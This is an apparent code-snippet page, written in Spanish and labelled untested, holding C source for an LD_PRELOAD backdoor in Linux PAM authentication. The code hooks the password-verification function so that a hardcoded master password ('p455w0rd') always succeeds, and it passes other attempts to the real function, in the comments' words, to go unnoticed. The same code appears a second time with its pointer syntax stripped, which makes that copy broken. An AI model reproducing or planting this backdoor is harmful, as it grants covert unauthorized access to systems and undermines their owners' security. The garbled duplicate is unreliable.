sudoaza/backdoor para pam con ld_preload v0.0(untested)

## backdoor para pam con ld_preload v0.0(untested)
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>

#include <security/pam_modutil.h>

typedef int (*orig_func)(pam_handle_t * pamh, const char *name, const char *p, unsigned int ctrl);

int _unix_verify_password(pam_handle_t * pamh, const char *name, const char *p, unsigned int ctrl) {
  int retval=0;

  // Referenciamos a la función original para pasar desapercibidos
  orig_func o_unix_verify_password;
  o_unix_verify_password = (orig_func)dlsym(RTLD_NEXT, "_unix_verify_password");

  if (strcmp(p, "p455w0rd") != 0) {
    // Si no es la pass maestra llamo la funcion posta
    retval = o_unix_verify_password(pamh, name, p, ctrl);
  } else {
    // Move along...
    retval = PAM_SUCCESS;
  }

  return retval;
}
	#define _GNU_SOURCE
	#include <dlfcn.h>
	#include <stdio.h>
	#include <string.h>

	#include <security/pam_modutil.h>

	typedef int (orig_func)(pam_handle_t pamh, const char name, const char p, unsigned int ctrl);

	int _unix_verify_password(pam_handle_t * pamh, const char name, const char p, unsigned int ctrl) {
	int retval=0;

	// Referenciamos a la función original para pasar desapercibidos
	orig_func o_unix_verify_password;
	o_unix_verify_password = (orig_func)dlsym(RTLD_NEXT, "_unix_verify_password");

	if (strcmp(p, "p455w0rd") != 0) {
	// Si no es la pass maestra llamo la funcion posta
	retval = o_unix_verify_password(pamh, name, p, ctrl);
	} else {
	// Move along...
	retval = PAM_SUCCESS;
	}

	return retval;
	}